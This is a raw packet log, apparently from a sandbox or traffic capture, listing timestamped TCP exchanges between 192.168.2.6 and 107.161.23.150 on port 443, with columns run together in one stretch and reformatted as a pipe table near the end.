                                                              Dec 19, 2024 11:56:13.174000978 CET  49721        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:13.244545937 CET  49721        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:17.371843100 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:17.371898890 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:17.371984959 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:17.372345924 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:17.372361898 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:18.627825975 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:18.627985001 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:18.629753113 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:18.629776955 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:18.630016088 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:18.631014109 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:18.671345949 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.078093052 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.198079109 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.198137045 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.198187113 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.198271036 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.198335886 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.198338032 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.198338985 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.284758091 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.314424992 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.314465046 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.314482927 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.314502954 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.314519882 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.314523935 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.314543962 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.314584970 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.314620972 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.314651012 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.314677000 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.356693029 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.356736898 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.356786966 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.356806040 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.356806040 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.356841087 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.356863976 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.356889963 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.356911898 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.484668970 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.484689951 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.484786987 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.484814882 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.484873056 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.513854027 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.513906956 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.513948917 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.514030933 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.514071941 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.514098883 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.542711020 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.542759895 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.542809963 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.542830944 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.542864084 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.542882919 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.659804106 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.659851074 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.659900904 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.659945011 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.659971952 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.659991026 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.679053068 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.679090977 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.679162025 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.679182053 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.679207087 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.679235935 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.699285984 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.699323893 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.699379921 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.699462891 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.699521065 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.699521065 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.719258070 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.719293118 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.719362974 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.719445944 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.719547987 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.719548941 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.736510038 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.736536980 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.736598015 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.736617088 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.736661911 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.736681938 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.756967068 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.756993055 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.757062912 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.757134914 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.757210970 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.757210970 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.856610060 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.856635094 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.856758118 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.856758118 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.856790066 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.856914997 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.871489048 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.871510029 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.871603012 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.871603012 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.871624947 CET  443          49738      107.161.23.150   192.168.2.6
                                                              Dec 19, 2024 11:56:19.871777058 CET  49738        443        192.168.2.6      107.161.23.150
                                                              Dec 19, 2024 11:56:19.885116100 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:19.885143042 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:19.885359049 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:19.885382891 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:19.885988951 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:19.896605015 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:19.896636009 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:19.896737099 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:19.896737099 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:19.896763086 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:19.900836945 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:19.910746098 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:19.910775900 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:19.911267042 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:19.911292076 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:19.911446095 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:19.922204971 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:19.922224998 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:19.922322035 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:19.922322035 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:19.922343016 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:19.923301935 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:19.935513020 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:19.935534954 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:19.935645103 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:19.935645103 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:19.935662031 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:19.936588049 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.039592981 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.039623022 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.039726019 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.039726019 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.039748907 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.039875031 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.048589945 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.048610926 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.048666954 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.048682928 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.048722982 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.048813105 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.058181047 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.058243036 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.058329105 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.058346033 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.058434963 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.058434963 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.067177057 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.067197084 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.067408085 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.067418098 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.067683935 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.075923920 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.075947046 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.076051950 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.076051950 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.076071978 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.076457977 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.084166050 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.084187984 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.084290981 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.084290981 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.084300041 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.084450960 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.091837883 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.091861963 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.091950893 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.091965914 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.091984034 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.092241049 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.100655079 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.100673914 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.100768089 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.100768089 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.100785017 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.100944042 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.231537104 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.231554031 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.231708050 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.231766939 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.231884003 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.238802910 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.238822937 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.238930941 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.238930941 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.238951921 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.239042044 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.245209932 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.245232105 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.245372057 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.245388985 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.245553017 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.252430916 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.252451897 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.252526045 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.252526045 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.252542973 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.252640009 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.259732962 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.259756088 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.259877920 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.259886980 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.260009050 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.266612053 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.266633987 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.266784906 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.266793966 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.266915083 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.273859024 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.273886919 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.273938894 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.273956060 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.274007082 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.274080038 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.280240059 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.280261040 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.280349016 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.280349016 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.280368090 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.280487061 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.424230099 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.424279928 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.424418926 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.424418926 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.424447060 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.424587965 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.431051016 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.431068897 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.431269884 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.431288004 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.436676979 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.437462091 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.437478065 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.437580109 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.437594891 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.437721014 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.444644928 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.444686890 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.444772005 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.444778919 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.444854021 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.451947927 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.451962948 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.452334881 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.452348948 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.452529907 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.458699942 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.458723068 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.458833933 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.458833933 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.458853960 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.459014893 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.466012955 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.466027975 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.466146946 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.466161966 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.466501951 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.472409010 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.472424984 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.472666979 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.472682953 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.472810984 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.615714073 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.615736008 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.615859985 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.615860939 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.615900040 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.616017103 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.622179031 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.622196913 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.622338057 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.622355938 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.622704029 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.629287958 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.629304886 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.629396915 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.629405975 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.629570007 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.636502028 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.636519909 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.636627913 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.636627913 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.636636972 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.636718035 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.643855095 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.643872976 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.643944025 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.643974066 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.644009113 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.644226074 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.650604010 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.650621891 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.650712013 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.650719881 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.650773048 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.651041031 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.656965971 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.656985998 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.657077074 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.657085896 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.657273054 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.664343119 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.664356947 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.664421082 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.664428949 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.664642096 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.807638884 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.807683945 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.807730913 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.807754040 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.807771921 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.807866096 CET49738443192.168.2.6107.161.23.150
                                                              Dec 19, 2024 11:56:20.815140009 CET44349738107.161.23.150192.168.2.6
                                                              Dec 19, 2024 11:56:20.815175056 CET44349738107.161.23.150192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 11:56:20.815212965 CET | 49738 | 443 | 192.168.2.6 | 107.161.23.150
Dec 19, 2024 11:56:20.815220118 CET | 443 | 49738 | 107.161.23.150 | 192.168.2.6
Dec 19, 2024 11:56:20.815257072 CET | 49738 | 443 | 192.168.2.6 | 107.161.23.150
Dec 19, 2024 11:56:20.815335989 CET | 49738 | 443 | 192.168.2.6 | 107.161.23.150
Dec 19, 2024 11:56:20.816059113 CET | 443 | 49738 | 107.161.23.150 | 192.168.2.6
Dec 19, 2024 11:56:20.816123009 CET | 49738 | 443 | 192.168.2.6 | 107.161.23.150
Dec 19, 2024 11:56:20.816129923 CET | 443 | 49738 | 107.161.23.150 | 192.168.2.6
Dec 19, 2024 11:56:20.816144943 CET | 443 | 49738 | 107.161.23.150 | 192.168.2.6
